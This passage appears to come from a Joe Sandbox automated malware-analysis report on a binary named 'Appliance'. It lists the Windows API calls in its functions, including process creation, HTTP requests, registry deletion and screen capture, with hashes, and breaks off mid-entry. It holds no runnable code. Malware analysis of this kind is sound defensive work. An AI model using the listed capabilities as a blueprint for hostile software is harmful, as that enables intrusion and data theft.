                                                                                                                                            • Instruction ID: e7640f26ba381009aed58d4e60e91dbbd756cff9f6b94a53f67c7b6087b1d053
                                                                                                                                            • Opcode Fuzzy Hash: 14d9c45c9eef71bc935030df799aaf8ffcc6a1a3f32b128caef7d2f67b7a4963
                                                                                                                                            • Instruction Fuzzy Hash: B7B103326087029FC714EF28C895A6BBBE6FF94724F10591DF496A7391D731D844CBA2
                                                                                                                                            APIs
                                                                                                                                            • _wcslen.LIBCMT ref: 00E4BBF8
                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E4BC10
                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00E4BC34
                                                                                                                                            • _wcslen.LIBCMT ref: 00E4BC60
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E4BC74
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00E4BC96
                                                                                                                                            • _wcslen.LIBCMT ref: 00E4BD92
                                                                                                                                              • Part of subcall function 00E30F4E: GetStdHandle.KERNEL32(000000F6), ref: 00E30F6D
                                                                                                                                            • _wcslen.LIBCMT ref: 00E4BDAB
                                                                                                                                            • _wcslen.LIBCMT ref: 00E4BDC6
                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00E4BE16
                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 00E4BE67
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00E4BE99
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E4BEAA
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E4BEBC
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00E4BECE
                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00E4BF43
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2178637699-0
                                                                                                                                            • Opcode ID: 8ded31ff8f2ac253309f46946dce1a8d89e1d8aaf1109235daf6230ef12e6b30
                                                                                                                                            • Instruction ID: 43769d59854076358e33295fdb93166e4ff018869eb49aecf9be14df4cdf182d
                                                                                                                                            • Opcode Fuzzy Hash: 8ded31ff8f2ac253309f46946dce1a8d89e1d8aaf1109235daf6230ef12e6b30
                                                                                                                                            • Instruction Fuzzy Hash: C5F1E0316043419FC714EF24D891B6ABBE5FF84314F18995DF889AB2A2CB31EC45CB62
                                                                                                                                            APIs
                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00E5DCD0), ref: 00E44B18
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00E44B2A
                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00E5DCD0), ref: 00E44B4F
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00E5DCD0), ref: 00E44B9B
                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028,?,00E5DCD0), ref: 00E44C05
                                                                                                                                            • SysFreeString.OLEAUT32(00000009), ref: 00E44CBF
                                                                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00E44D25
                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00E44D4F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                            • API String ID: 354098117-199464113
                                                                                                                                            • Opcode ID: 9c579365fa9605a4c53f6547fe719d193a4d8b7f0ae9395f5c25aa39810f169c
                                                                                                                                            • Instruction ID: b83de01aaad6ce63e01553218a53f57f6d81dca855c1f044dd0ced148337093e
                                                                                                                                            • Opcode Fuzzy Hash: 9c579365fa9605a4c53f6547fe719d193a4d8b7f0ae9395f5c25aa39810f169c
                                                                                                                                            • Instruction Fuzzy Hash: 7D123CB1A00205EFDB14DF94D884FAEBBB5FF45318F149098E915AB291D731ED46CBA0
                                                                                                                                            APIs
                                                                                                                                            • GetMenuItemCount.USER32(00E929C0), ref: 00E03F72
                                                                                                                                            • GetMenuItemCount.USER32(00E929C0), ref: 00E04022
                                                                                                                                            • GetCursorPos.USER32(?), ref: 00E04066
                                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 00E0406F
                                                                                                                                            • TrackPopupMenuEx.USER32(00E929C0,00000000,?,00000000,00000000,00000000), ref: 00E04082
                                                                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E0408E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                            • String ID: 0
                                                                                                                                            • API String ID: 36266755-4108050209
                                                                                                                                            • Opcode ID: ad96ff89216d78f0ef7355acc7aabae1c19fe11b6396016e28c521054292254f
                                                                                                                                            • Instruction ID: 45fac88943343cdd72b3b420e41d5b0a7c89df22582c85bfc7826b5525f67edb
                                                                                                                                            • Opcode Fuzzy Hash: ad96ff89216d78f0ef7355acc7aabae1c19fe11b6396016e28c521054292254f
                                                                                                                                            • Instruction Fuzzy Hash: 13710670644306BEEB319F69DC49FAABF68FF04368F10420AF614B61E1C7B19954DB51
                                                                                                                                            APIs
                                                                                                                                            • DestroyWindow.USER32(00000000,?), ref: 00E57823
                                                                                                                                              • Part of subcall function 00DC8577: _wcslen.LIBCMT ref: 00DC858A
                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00E57897
                                                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00E578B9
                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E578CC
                                                                                                                                            • DestroyWindow.USER32(?), ref: 00E578ED
                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00DC0000,00000000), ref: 00E5791C
                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00E57935
                                                                                                                                            • GetDesktopWindow.USER32 ref: 00E5794E
                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00E57955
                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00E5796D
                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00E57985
                                                                                                                                              • Part of subcall function 00DC2234: GetWindowLongW.USER32(?,000000EB), ref: 00DC2242
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                            • String ID: 0$tooltips_class32
                                                                                                                                            • API String ID: 2429346358-3619404913
                                                                                                                                            • Opcode ID: 909d7c734207e8d813b2861dc41f442db90ffeed84ae48374d27ac103907f3e0
                                                                                                                                            • Instruction ID: 82cfb12def3b238f5262d3c5d6d363e1aaf9e52920b792fd122e764fd1b93487
                                                                                                                                            • Opcode Fuzzy Hash: 909d7c734207e8d813b2861dc41f442db90ffeed84ae48374d27ac103907f3e0
                                                                                                                                            • Instruction Fuzzy Hash: 11718970108345AFD725CF19DC48F6ABBF9EBC9305F04581EF985A7261C770A91ACB61
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DC1488,?,00000000,?,?,?,?,00DC145A,00000000,?), ref: 00DC1865
                                                                                                                                            • DestroyWindow.USER32(?), ref: 00DC1521
                                                                                                                                            • KillTimer.USER32(00000000,?,?,?,?,00DC145A,00000000,?), ref: 00DC15BB
                                                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 00E029B4
                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00DC145A,00000000,?), ref: 00E029E2
                                                                                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00DC145A,00000000,?), ref: 00E029F9
                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00DC145A,00000000), ref: 00E02A15
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00E02A27
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                            • String ID: <)
                                                                                                                                            • API String ID: 641708696-200976629
                                                                                                                                            • Opcode ID: 52b86dc0a6ba009f38e809fe95f5d381d86b5fdad95d04c0e3a173b0683afd49
                                                                                                                                            • Instruction ID: f46a1ccdb0c019bb0d1e80f6af0b119d2ebb11e342566b484d2e833c2076ff8b
                                                                                                                                            • Opcode Fuzzy Hash: 52b86dc0a6ba009f38e809fe95f5d381d86b5fdad95d04c0e3a173b0683afd49
                                                                                                                                            • Instruction Fuzzy Hash: D761AD34605722EFCB398F15C948F2977F1FB81326F14541EE182A76A1C770E899CB60
                                                                                                                                            APIs
                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E3CEF5
                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E3CF08
                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E3CF1C
                                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E3CF35
                                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00E3CF78
                                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E3CF8E
                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E3CF99
                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E3CFC9
                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E3D021
                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E3D035
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00E3D040
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3800310941-3916222277
                                                                                                                                            • Opcode ID: ad756fd1af6472993d8b547242f1e4911b0fa5e4885bfc605114c7187dde7737
                                                                                                                                            • Instruction ID: 345e30fb9529bafe8197bc8fcf65691d1526e72a007644ba90184252df0185ac
                                                                                                                                            • Opcode Fuzzy Hash: ad756fd1af6472993d8b547242f1e4911b0fa5e4885bfc605114c7187dde7737
                                                                                                                                            • Instruction Fuzzy Hash: 355198B1604708BFDB259F61DC88AAA7FFDFF08749F10581AF945A6210D730D949EB60
                                                                                                                                            APIs
                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00E566D6,?,?), ref: 00E58FEE
                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00E566D6,?,?,00000000,?), ref: 00E58FFE
                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00E566D6,?,?,00000000,?), ref: 00E59009
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00E566D6,?,?,00000000,?), ref: 00E59016
                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00E59024
                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E566D6,?,?,00000000,?), ref: 00E59033
                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00E5903C
                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00E566D6,?,?,00000000,?), ref: 00E59043
                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E566D6,?,?,00000000,?), ref: 00E59054
                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E60C04,?), ref: 00E5906D
                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00E5907D
                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00E5909D
                                                                                                                                            • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00E590CD
                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00E590F5
                                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E5910B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3840717409-0
                                                                                                                                            • Opcode ID: 66f10afaf37b760f1682b0afc930fa2dd3e0a1d5599d21bdd30ab3544b3e6ee6
                                                                                                                                            • Instruction ID: 17f3d5d84c848c74fa78393270cca726b9baea711b06450e868a1156a09e913d
                                                                                                                                            • Opcode Fuzzy Hash: 66f10afaf37b760f1682b0afc930fa2dd3e0a1d5599d21bdd30ab3544b3e6ee6
                                                                                                                                            • Instruction Fuzzy Hash: 7D414975600208FFDB259F66DC48EAABBB8FF89716F104858F905E72A1D7309949DB20
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DCB329: _wcslen.LIBCMT ref: 00DCB333
                                                                                                                                              • Part of subcall function 00E4D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E4C10E,?,?), ref: 00E4D415
                                                                                                                                              • Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D451
                                                                                                                                              • Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4C8
                                                                                                                                              • Part of subcall function 00E4D3F8: _wcslen.LIBCMT ref: 00E4D4FE
                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E4C154
                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E4C1D2
                                                                                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 00E4C26A
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00E4C2DE
                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00E4C2FC
                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00E4C352
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00E4C364
                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00E4C382
                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00E4C3E3
                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00E4C3F4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                            • API String ID: 146587525-4033151799
                                                                                                                                            • Opcode ID: 21315173815555c2850bfb6505117c66bafa97d5df597440f169ed6b7594c8a1
                                                                                                                                            • Instruction ID: f52a897fa8f9803b6c4990beac420798a460ad4abe4f0df69425dc22c4d1fd41
                                                                                                                                            • Opcode Fuzzy Hash: 21315173815555c2850bfb6505117c66bafa97d5df597440f169ed6b7594c8a1
                                                                                                                                            • Instruction Fuzzy Hash: E3C18130205202AFD754DF14D885F5ABBE1FF44318F24949CE45A9B3A2CB71EC46CBA1
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0
                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00E5A990
                                                                                                                                            • GetSystemMetrics.USER32(00000011), ref: 00E5A9A7
                                                                                                                                            • GetSystemMetrics.USER32(00000004), ref: 00E5A9B3
                                                                                                                                            • GetSystemMetrics.USER32(0000000F), ref: 00E5A9C9
                                                                                                                                            • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00E5AC15
                                                                                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00E5AC33
                                                                                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00E5AC54
                                                                                                                                            • ShowWindow.USER32(00000003,00000000), ref: 00E5AC73
                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00E5AC95
                                                                                                                                            • DefDlgProcW.USER32(?,00000005,?), ref: 00E5ACBB
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                            • String ID: @$(
                                                                                                                                            • API String ID: 3962739598-2721164788
                                                                                                                                            • Opcode ID: 5032f7df9966c66056d31ca0786dd255251934f366474c82f592adbe7a071136
                                                                                                                                            • Instruction ID: bd282328fb314819435893a94a33720a83dc237a6393679a0dbf63e996cacef9
                                                                                                                                            • Opcode Fuzzy Hash: 5032f7df9966c66056d31ca0786dd255251934f366474c82f592adbe7a071136
                                                                                                                                            • Instruction Fuzzy Hash: D2B19B30600219EFCF14CF69C9847BE7BB2BF44706F18957AED44AB295D770A988CB91
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00DC249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00DC24B0
                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E597B6
                                                                                                                                            • GetFocus.USER32 ref: 00E597C6
                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 00E597D1
                                                                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00E59879
                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E5992B
                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 00E59948
                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 00E59958
                                                                                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E5998A
                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E599CC
                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E599FD
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                            • String ID: 0$(
                                                                                                                                            • API String ID: 1026556194-1385328161
                                                                                                                                            • Opcode ID: 4faf9f62c08fe9d05b1e4bd33d6088a64592e58db9b83ffe450763289b58b800
                                                                                                                                            • Instruction ID: 0d71968cdba7aba1e31371c664919353d1e781f791543e712bf06d1f8259e257
                                                                                                                                            • Opcode Fuzzy Hash: 4faf9f62c08fe9d05b1e4bd33d6088a64592e58db9b83ffe450763289b58b800
                                                                                                                                            • Instruction Fuzzy Hash: 2581BC71508301EFDB24DF25C884AAA7BE8FB89319F041D1DFD85A7292D770D909CBA2
                                                                                                                                            APIs
                                                                                                                                            • GetDC.USER32(00000000), ref: 00E43035
                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00E43045
                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 00E43051
                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 00E4305E
                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00E430CA
                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00E43109
                                                                                                                                            • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00E4312D
                                                                                                                                            • SelectObject.GDI32(?,?), ref: 00E43135
                                                                                                                                            • DeleteObject.GDI32(?), ref: 00E4313E
                                                                                                                                            • DeleteDC.GDI32(?), ref: 00E43145
                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 00E43150
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
